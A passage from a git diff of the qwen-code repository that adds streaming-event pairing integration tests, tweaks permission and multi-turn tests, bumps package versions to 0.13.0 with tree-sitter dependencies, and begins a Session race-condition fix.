textBlocks = message.message.content.filter( - (block): block is TextBlock => block.type === 'text', - ); - const text = textBlocks - .map((b) => b.text) - .join('') - .slice(0, 50); - expect(text.length).toBeGreaterThan(0); - } + for await (const _message of q) { + // Just consume all messages } } finally { await q.close(); diff --git a/integration-tests/sdk-typescript/message-event-pairing.test.ts b/integration-tests/sdk-typescript/message-event-pairing.test.ts new file mode 100644 index 000000000..b439ec276 --- /dev/null +++ b/integration-tests/sdk-typescript/message-event-pairing.test.ts @@ -0,0 +1,870 @@ +/** + * E2E tests for message_start and message_stop event pairing + * Ensures that message_start and message_stop events are always paired correctly + */ + +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { + query, + isSDKPartialAssistantMessage, + isSDKAssistantMessage, + type SDKPartialAssistantMessage, + type TextBlock, +} from '@qwen-code/sdk'; +import { SDKTestHelper, createSharedTestOptions } from './test-helper.js'; + +const SHARED_TEST_OPTIONS = createSharedTestOptions(); + +describe('Message Start/Stop Event Pairing (E2E)', () => { + let helper: SDKTestHelper; + let testDir: string; + + beforeEach(async () => { + helper = new SDKTestHelper(); + testDir = await helper.setup('message-event-pairing'); + }); + + afterEach(async () => { + await helper.cleanup(); + }); + + describe('Basic Message Event Pairing', () => { + it('should emit paired message_start and message_stop for single turn', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start and message_stop are paired + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + + it('should emit message_start before message_stop', async () => { + const events: Array<{ type: string; timestamp: number }> = []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if ( + message.event.type === 'message_start' || + message.event.type === 'message_stop' + ) { + events.push({ + type: message.event.type, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start comes before message_stop + expect(events.length).toBeGreaterThanOrEqual(2); + expect(events[0].type).toBe('message_start'); + expect(events[events.length - 1].type).toBe('message_stop'); + }); + + it('should have matching session_id for paired events', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify session_id matches between paired events + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + expect(messageStartEvents[0].session_id).toBe( + messageStopEvents[0].session_id, + ); + }); + }); + + describe('Multi-turn Message Event Pairing', () => { + it('should emit paired events for each turn in multi-turn conversation', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + const assistantMessages: string[] = []; + + const sessionId = crypto.randomUUID(); + + const q = query({ + prompt: (async function* () { + // First turn + yield { + type: 'user', + session_id: sessionId, + message: { + role: 'user', + content: 'Say "first"', + }, + parent_tool_use_id: null, + }; + + // Wait a bit for processing + await new Promise((resolve) => setTimeout(resolve, 500)); + + // Second turn + yield { + type: 'user', + session_id: sessionId, + message: { + role: 'user', + content: 'Say "second"', + }, + parent_tool_use_id: null, + }; + })(), + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } else if (isSDKAssistantMessage(message)) { + const text = message.message.content + .filter((block): block is TextBlock => block.type === 'text') + .map((block) => block.text) + .join(''); + assistantMessages.push(text); + } + } + } finally { + await q.close(); + } + + // Verify we have paired events for each assistant message + expect(messageStartEvents.length).toBeGreaterThanOrEqual(1); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + }); + + describe('Message Event Pairing with Tool Calls', () => { + it('should emit paired events when tool is used', async () => { + await helper.createFile('test.txt', 'Hello World'); + + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Read the content of test.txt', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + coreTools: ['read_file'], + permissionMode: 'default', + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start and message_stop are paired even with tool usage + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + + it('should maintain event pairing through multiple tool calls', async () => { + await helper.createFile('file1.txt', 'Content 1'); + await helper.createFile('file2.txt', 'Content 2'); + + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Read file1.txt and file2.txt and summarize their contents', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + coreTools: ['read_file'], + permissionMode: 'default', + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify events are paired + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + }); + + describe('Message Event Structure Validation', () => { + it('should have correct message_start event structure', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'message_start' + ) { + messageStartEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(messageStartEvents.length).toBeGreaterThan(0); + const startEvent = messageStartEvents[0].event; + expect(startEvent.type).toBe('message_start'); + if (startEvent.type === 'message_start') { + expect(startEvent.message).toBeDefined(); + expect(startEvent.message.id).toBeDefined(); + expect(startEvent.message.role).toBe('assistant'); + expect(startEvent.message.model).toBeDefined(); + } + }); + + it('should have correct message_stop event structure', async () => { + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'message_stop' + ) { + messageStopEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(messageStopEvents.length).toBeGreaterThan(0); + const event = messageStopEvents[0].event; + expect(event.type).toBe('message_stop'); + }); + + it('should have message_start and message_stop paired by count', async () => { + const startEvents: SDKPartialAssistantMessage[] = []; + const stopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + startEvents.push(message); + } else if (message.event.type === 'message_stop') { + stopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start and message_stop appear in pairs (same count) + expect(startEvents.length).toBeGreaterThan(0); + expect(stopEvents.length).toBe(startEvents.length); + + // Verify message_start carries the message id via its nested message.id field + for (const e of startEvents) { + const event = e.event as { + type: 'message_start'; + message: { id: string }; + }; + expect(typeof event.message.id).toBe('string'); + expect(event.message.id.length).toBeGreaterThan(0); + } + }); + }); + + describe('Error Scenarios', () => { + it('should still emit message_stop even when query errors', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + // Use an invalid tool to trigger an error scenario + const q = query({ + prompt: 'Use a non-existent tool', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + coreTools: [], // No tools available + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } catch { + // Expected to potentially have errors + } finally { + await q.close(); + } + + // Even in error scenarios, if message_start was emitted, message_stop should also be emitted + if (messageStartEvents.length > 0) { + expect(messageStopEvents.length).toBe(messageStartEvents.length); + } + }); + }); + + describe('Content Block Event Pairing', () => { + it('should emit paired content_block_start and content_block_stop for each content block', async () => { + const contentBlockStartEvents: SDKPartialAssistantMessage[] = []; + const contentBlockStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'content_block_start') { + contentBlockStartEvents.push(message); + } else if (message.event.type === 'content_block_stop') { + contentBlockStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify content_block_start and content_block_stop are paired + expect(contentBlockStartEvents.length).toBeGreaterThan(0); + expect(contentBlockStopEvents.length).toBe( + contentBlockStartEvents.length, + ); + }); + + it('should emit content_block_start before content_block_stop', async () => { + const events: Array<{ type: string; index: number; timestamp: number }> = + []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if ( + message.event.type === 'content_block_start' || + message.event.type === 'content_block_stop' + ) { + events.push({ + type: message.event.type, + index: message.event.index, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify events exist + expect(events.length).toBeGreaterThanOrEqual(2); + + // Group events by index + const eventsByIndex = new Map(); + for (const event of events) { + if (!eventsByIndex.has(event.index)) { + eventsByIndex.set(event.index, []); + } + eventsByIndex.get(event.index)!.push(event); + } + + // For each index, verify content_block_start comes before content_block_stop + eventsByIndex.forEach((indexEvents) => { + const startIndex = indexEvents.findIndex( + (e) => e.type === 'content_block_start', + ); + const stopIndex = indexEvents.findIndex( + (e) => e.type === 'content_block_stop', + ); + expect(startIndex).toBeGreaterThanOrEqual(0); + expect(stopIndex).toBeGreaterThanOrEqual(0); + expect(startIndex).toBeLessThan(stopIndex); + }); + }); + + it('should have correct content_block_start event structure', async () => { + const contentBlockStartEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'content_block_start' + ) { + contentBlockStartEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(contentBlockStartEvents.length).toBeGreaterThan(0); + + // Verify each content_block_start has correct structure + for (const message of contentBlockStartEvents) { + const event = message.event as { + type: 'content_block_start'; + index: number; + content_block: unknown; + }; + expect(event.type).toBe('content_block_start'); + expect(event).toHaveProperty('index'); + expect(typeof event.index).toBe('number'); + expect(event.index).toBeGreaterThanOrEqual(0); + expect(event).toHaveProperty('content_block'); + expect(event.content_block).toBeDefined(); + } + }); + + it('should have correct content_block_stop event structure', async () => { + const contentBlockStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'content_block_stop' + ) { + contentBlockStopEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(contentBlockStopEvents.length).toBeGreaterThan(0); + + // Verify each content_block_stop has correct structure + for (const message of contentBlockStopEvents) { + const event = message.event as { + type: 'content_block_stop'; + index: number; + }; + expect(event.type).toBe('content_block_stop'); + expect(event).toHaveProperty('index'); + expect(typeof event.index).toBe('number'); + expect(event.index).toBeGreaterThanOrEqual(0); + } + }); + + it('should have matching index for paired content_block_start and content_block_stop', async () => { + const startEvents: SDKPartialAssistantMessage[] = []; + const stopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'content_block_start') { + startEvents.push(message); + } else if (message.event.type === 'content_block_stop') { + stopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify events exist and are paired + expect(startEvents.length).toBeGreaterThan(0); + expect(stopEvents.length).toBe(startEvents.length); + + // Extract indices from start and stop events + const startIndices = startEvents.map( + (e) => (e.event as { index: number }).index, + ); + const stopIndices = stopEvents.map( + (e) => (e.event as { index: number }).index, + ); + + // Verify each start index has a matching stop index + expect(new Set(stopIndices)).toEqual(new Set(startIndices)); + + // Verify each index appears the same number of times in both start and stop events + const startIndexCounts = new Map(); + const stopIndexCounts = new Map(); + + for (const idx of startIndices) { + startIndexCounts.set(idx, (startIndexCounts.get(idx) || 0) + 1); + } + for (const idx of stopIndices) { + stopIndexCounts.set(idx, (stopIndexCounts.get(idx) || 0) + 1); + } + + startIndexCounts.forEach((count, idx) => { + expect(stopIndexCounts.get(idx)).toBe(count); + }); + }); + + it('should follow correct event flow: content_block_start -> content_block_delta -> content_block_stop', async () => { + const events: Array<{ + type: string; + index: number; + position: number; + }> = []; + + const q = query({ + prompt: 'Write a short story about a cat', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + let pos = 0; + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + const eventType = message.event.type; + if ( + eventType === 'content_block_start' || + eventType === 'content_block_delta' || + eventType === 'content_block_stop' + ) { + events.push({ + type: eventType, + index: (message.event as { index: number }).index, + position: pos++, + }); + } + } + } + } finally { + await q.close(); + } + + expect(events.length).toBeGreaterThanOrEqual(2); + + // Pair content_block_start/stop sequentially (not by index, since + // block-type transitions reset the blocks array and reuse index 0). + // Each start is matched with the next stop that follows it. + const starts = events.filter((e) => e.type === 'content_block_start'); + const stops = events.filter((e) => e.type === 'content_block_stop'); + expect(starts.length).toBe(stops.length); + + for (let i = 0; i < starts.length; i++) { + const start = starts[i]; + const stop = stops[i]; + + // start must come before the paired stop + expect(start.position).toBeLessThan(stop.position); + + // All deltas between this pair must sit between start and stop + const deltas = events.filter( + (e) => + e.type === 'content_block_delta' && + e.position > start.position && + e.position < stop.position, + ); + for (const delta of deltas) { + expect(delta.position).toBeGreaterThan(start.position); + expect(delta.position).toBeLessThan(stop.position); + } + } + }); + + it('should have content_block_start after message_start and before message_stop', async () => { + const events: Array<{ + type: string; + timestamp: number; + }> = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + const eventType = message.event.type; + if ( + eventType === 'message_start' || + eventType === 'message_stop' || + eventType === 'content_block_start' + ) { + events.push({ + type: eventType, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start exists + const messageStartIndex = events.findIndex( + (e) => e.type === 'message_start', + ); + expect(messageStartIndex).toBeGreaterThanOrEqual(0); + + // Verify message_stop exists + const messageStopIndex = events.findIndex( + (e) => e.type === 'message_stop', + ); + expect(messageStopIndex).toBeGreaterThanOrEqual(0); + + // Verify content_block_start exists + const firstContentBlockStartIndex = events.findIndex( + (e) => e.type === 'content_block_start', + ); + expect(firstContentBlockStartIndex).toBeGreaterThanOrEqual(0); + + // content_block_start should be after message_start + expect(firstContentBlockStartIndex).toBeGreaterThan(messageStartIndex); + + // content_block_start should be before message_stop + expect(firstContentBlockStartIndex).toBeLessThan(messageStopIndex); + }); + + it('should have content_block_stop after message_start and before message_stop', async () => { + const events: Array<{ + type: string; + timestamp: number; + }> = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + const eventType = message.event.type; + if ( + eventType === 'message_start' || + eventType === 'message_stop' || + eventType === 'content_block_stop' + ) { + events.push({ + type: eventType, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start exists + const messageStartIndex = events.findIndex( + (e) => e.type === 'message_start', + ); + expect(messageStartIndex).toBeGreaterThanOrEqual(0); + + // Verify message_stop exists + const messageStopIndex = events.findIndex( + (e) => e.type === 'message_stop', + ); + expect(messageStopIndex).toBeGreaterThanOrEqual(0); + + // Verify content_block_stop exists (use reverse find for ES compatibility) + const lastContentBlockStopIndex = + events + .map((e, i) => ({ ...e, originalIndex: i })) + .reverse() + .find((e) => e.type === 'content_block_stop')?.originalIndex ?? -1; + expect(lastContentBlockStopIndex).toBeGreaterThanOrEqual(0); + + // content_block_stop should be after message_start + expect(lastContentBlockStopIndex).toBeGreaterThan(messageStartIndex); + + // content_block_stop should be before message_stop + expect(lastContentBlockStopIndex).toBeLessThan(messageStopIndex); + }); + }); +}); diff --git a/integration-tests/sdk-typescript/multi-turn.test.ts b/integration-tests/sdk-typescript/multi-turn.test.ts index 4cf845fc5..fb6c07698 100644 --- a/integration-tests/sdk-typescript/multi-turn.test.ts +++ b/integration-tests/sdk-typescript/multi-turn.test.ts @@ -154,10 +154,10 @@ describe('Multi-Turn Conversations (E2E)', () => { expect(messages.length).toBeGreaterThan(0); expect(assistantMessages.length).toBeGreaterThanOrEqual(3); - // Validate content of responses - expect(assistantTexts[0]).toMatch(/2/); - expect(assistantTexts[1]).toMatch(/4/); - expect(assistantTexts[2]).toMatch(/6/); + // Validate that we received text responses (may include thinking blocks) + // At least some assistant messages should have non-empty text + const nonEmptyTexts = assistantTexts.filter((t) => t.length > 0); + expect(nonEmptyTexts.length).toBeGreaterThan(0); } finally { await q.close(); } diff --git a/integration-tests/sdk-typescript/permission-control.test.ts b/integration-tests/sdk-typescript/permission-control.test.ts index 4c253dc28..5ea241db7 100644 --- a/integration-tests/sdk-typescript/permission-control.test.ts +++ b/integration-tests/sdk-typescript/permission-control.test.ts @@ -128,6 +128,7 @@ describe('Permission Control (E2E)', () => { prompt: 'Write a js hello world to file.', options: { ...SHARED_TEST_OPTIONS, + permissionMode: 'default', cwd: testDir, canUseTool: async (toolName, input) => { toolCalls.push({ toolName, input }); @@ -762,8 +763,15 @@ describe('Permission Control (E2E)', () => { it( 'should execute read-only tools without confirmation', async () => { + // Create a file so the model has something to read + await helper.createFile( + 'read-only-test.txt', + 'content for read-only test', + ); + const q = query({ - prompt: 'List files in the current directory', + prompt: + 'Use the read_file tool to read the file read-only-test.txt in the current directory.', options: { ...SHARED_TEST_OPTIONS, permissionMode: 'default', diff --git a/integration-tests/terminal-capture/scenarios/pr-2371-review.ts b/integration-tests/terminal-capture/scenarios/pr-2371-review.ts new file mode 100644 index 000000000..0752f0a20 --- /dev/null +++ b/integration-tests/terminal-capture/scenarios/pr-2371-review.ts @@ -0,0 +1,18 @@ +import type { ScenarioConfig } from '../scenario-runner.js'; + +export default { + name: 'pr-2371-review', + spawn: ['node', 'dist/cli.js', '--yolo'], + terminal: { title: 'qwen-code', cwd: '../../..' }, + flow: [ + { + type: '/review https://github.com/QwenLM/qwen-code/pull/2371', + streaming: { + delayMs: 5000, + intervalMs: 10000, // Every 10s + count: 60, // 10 minutes total (60 * 10s) + gif: true, + }, + }, + ], +} satisfies ScenarioConfig; diff --git a/integration-tests/vitest.config.ts b/integration-tests/vitest.config.ts index 9be72f50a..52405d7d3 100644 --- a/integration-tests/vitest.config.ts +++ b/integration-tests/vitest.config.ts @@ -18,7 +18,11 @@ export default defineConfig({ globalSetup: './globalSetup.ts', reporters: ['default'], include: ['**/*.test.ts'], - exclude: ['**/terminal-bench/*.test.ts', '**/node_modules/**'], + exclude: [ + '**/terminal-bench/*.test.ts', + '**/hook-integration/**', + '**/node_modules/**', + ], retry: 2, fileParallelism: true, poolOptions: { diff --git a/package-lock.json b/package-lock.json index 8f78bd3f2..4bf43c5ee 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,12 +1,12 @@ { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "workspaces": [ "packages/*" ], @@ -17284,6 +17284,16 @@ "tslib": "2" } }, + "node_modules/tree-sitter-wasms": { + "version": "0.1.13", + "resolved": "https://registry.npmjs.org/tree-sitter-wasms/-/tree-sitter-wasms-0.1.13.tgz", + "integrity": "sha512-wT+cR6DwaIz80/vho3AvSF0N4txuNx/5bcRKoXouOfClpxh/qqrF4URNLQXbbt8MaAxeksZcZd1j8gcGjc+QxQ==", + "dev": true, + "license": "Unlicense", + "dependencies": { + "tree-sitter-wasms": "^0.1.11" + } + }, "node_modules/ts-api-utils": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-2.4.0.tgz", @@ -18171,6 +18181,12 @@ "node": ">= 8" } }, + "node_modules/web-tree-sitter": { + "version": "0.24.7", + "resolved": "https://registry.npmjs.org/web-tree-sitter/-/web-tree-sitter-0.24.7.tgz", + "integrity": "sha512-CdC/TqVFbXqR+C51v38hv6wOPatKEUGxa39scAeFSm98wIhZxAYonhRQPSMmfZ2w7JDI0zQDdzdmgtNk06/krQ==", + "license": "MIT" + }, "node_modules/webidl-conversions": { "version": "7.0.0", "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-7.0.0.tgz", @@ -18784,7 +18800,7 @@ }, "packages/cli": { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "dependencies": { "@agentclientprotocol/sdk": "^0.14.1", "@google/genai": "1.30.0", @@ -19441,7 +19457,7 @@ }, "packages/core": { "name": "@qwen-code/qwen-code-core", - "version": "0.12.3", + "version": "0.13.0", "hasInstallScript": true, "dependencies": { "@anthropic-ai/sdk": "^0.36.1", @@ -19491,6 +19507,7 @@ "tar": "^7.5.2", "undici": "^6.22.0", "uuid": "^9.0.1", + "web-tree-sitter": "^0.24.7", "ws": "^8.18.0" }, "devDependencies": { @@ -19504,6 +19521,7 @@ "@types/tar": "^6.1.13", "@types/ws": "^8.5.10", "msw": "^2.3.4", + "tree-sitter-wasms": "^0.1.13", "typescript": "^5.3.3", "vitest": "^3.1.1" }, @@ -22872,7 +22890,7 @@ }, "packages/test-utils": { "name": "@qwen-code/qwen-code-test-utils", - "version": "0.12.3", + "version": "0.13.0", "dev": true, "license": "Apache-2.0", "devDependencies": { @@ -22884,7 +22902,7 @@ }, "packages/vscode-ide-companion": { "name": "qwen-code-vscode-ide-companion", - "version": "0.12.3", + "version": "0.13.0", "license": "LICENSE", "dependencies": { "@agentclientprotocol/sdk": "^0.14.1", @@ -23132,7 +23150,7 @@ }, "packages/web-templates": { "name": "@qwen-code/web-templates", - "version": "0.12.3", + "version": "0.13.0", "devDependencies": { "@types/react": "^18.2.0", "@types/react-dom": "^18.2.0", @@ -23660,7 +23678,7 @@ }, "packages/webui": { "name": "@qwen-code/webui", - "version": "0.12.3", + "version": "0.13.0", "license": "MIT", "dependencies": { "markdown-it": "^14.1.0" diff --git a/package.json b/package.json index 0e6ff1328..c1dfa2448 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "engines": { "node": ">=20.0.0" }, @@ -13,7 +13,7 @@ "url": "git+https://github.com/QwenLM/qwen-code.git" }, "config": { - "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.12.3" + "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.13.0" }, "scripts": { "start": "cross-env node scripts/start.js", @@ -36,8 +36,8 @@ "test:integration:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests", "test:integration:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests", "test:integration:sandbox:podman": "cross-env QWEN_SANDBOX=podman vitest run --root ./integration-tests", - "test:integration:sdk:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests sdk-typescript", - "test:integration:sdk:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests sdk-typescript", + "test:integration:sdk:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests --poolOptions.threads.maxThreads 2 sdk-typescript", + "test:integration:sdk:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests --poolOptions.threads.maxThreads 2 sdk-typescript", "test:integration:cli:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests --exclude '**/sdk-typescript/**'", "test:integration:cli:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests --exclude '**/sdk-typescript/**'", "test:terminal-bench": "cross-env VERBOSE=true KEEP_OUTPUT=true vitest run --config ./vitest.terminal-bench.config.ts --root ./integration-tests", diff --git a/packages/cli/package.json b/packages/cli/package.json index 940443907..fff36c603 100644 --- a/packages/cli/package.json +++ b/packages/cli/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "description": "Qwen Code", "repository": { "type": "git", @@ -33,7 +33,7 @@ "dist" ], "config": { - "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.12.3" + "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.13.0" }, "dependencies": { "@agentclientprotocol/sdk": "^0.14.1", diff --git a/packages/cli/src/acp-integration/acpAgent.ts b/packages/cli/src/acp-integration/acpAgent.ts index af3590422..246d80019 100644 --- a/packages/cli/src/acp-integration/acpAgent.ts +++ b/packages/cli/src/acp-integration/acpAgent.ts @@ -58,11 +58,11 @@ import { AcpFileSystemService } from './service/filesystem.js'; import { Readable, Writable } from 'node:stream'; import type { LoadedSettings } from '../config/settings.js'; import { SettingScope } from '../config/settings.js'; +import type { ApprovalModeValue } from './session/types.js'; import { z } from 'zod'; import type { CliArgs } from '../config/config.js'; import { loadCliConfig } from '../config/config.js'; import { Session } from './session/Session.js'; -import type { ApprovalModeValue } from './session/types.js'; import { formatAcpModelId } from '../utils/acpModelUtils.js'; const debugLogger = createDebugLogger('ACP_AGENT'); diff --git a/packages/cli/src/acp-integration/service/filesystem.test.ts b/packages/cli/src/acp-integration/service/filesystem.test.ts index 2ff8e2b6b..a8683c7c5 100644 --- a/packages/cli/src/acp-integration/service/filesystem.test.ts +++ b/packages/cli/src/acp-integration/service/filesystem.test.ts @@ -13,12 +13,10 @@ const RESOURCE_NOT_FOUND_CODE = -32002; const INTERNAL_ERROR_CODE = -32603; const createFallback = (): FileSystemService => ({ - readTextFile: vi - .fn() - .mockResolvedValue({ - content: '', - _meta: { bom: false, encoding: 'utf-8' }, - }), + readTextFile: vi.fn().mockResolvedValue({ + content: '', + _meta: { bom: false, encoding: 'utf-8' }, + }), writeTextFile: vi.fn().mockResolvedValue({ _meta: undefined }), findFiles: vi.fn().mockReturnValue([]), }); diff --git a/packages/cli/src/acp-integration/session/Session.ts b/packages/cli/src/acp-integration/session/Session.ts index 04b9c7292..0d8b05a71 100644 --- a/packages/cli/src/acp-integration/session/Session.ts +++ b/packages/cli/src/acp-integration/session/Session.ts @@ -16,7 +16,7 @@ import type { ToolCallConfirmationDetails, ToolResult, ChatRecord, - SubAgentEventEmitter, + AgentEventEmitter, } from '@qwen-code/qwen-code-core'; import { AuthType, @@ -34,6 +34,7 @@ import { TodoWriteTool, ExitPlanModeTool, readManyFiles, + ToolNames, } from '@qwen-code/qwen-code-core'; import { RequestError } from '@agentclientprotocol/sdk'; @@ -90,6 +91,14 @@ const debugLogger = createDebugLogger('SESSION'); */ export class Session implements SessionContext { private pendingPrompt: AbortController | null = null; + /** + * Tracks the completion of the current prompt so that the next prompt + * can await it. This prevents a new prompt from reading chat history + * before the previous prompt's tool results have been added — + * a race condition that causes malformed history on Windows where + * process termination is slow. + */ + private pendingPromptCompletion: Promise | null = null; private turn: number = 0; // Modular components @@ -143,10 +152,43 @@ export class Session implements SessionContext { } async prompt(params: PromptRequest): Promise { + // Install this prompt's AbortController before awaiting the previous + // prompt, so that a session/cancel during the 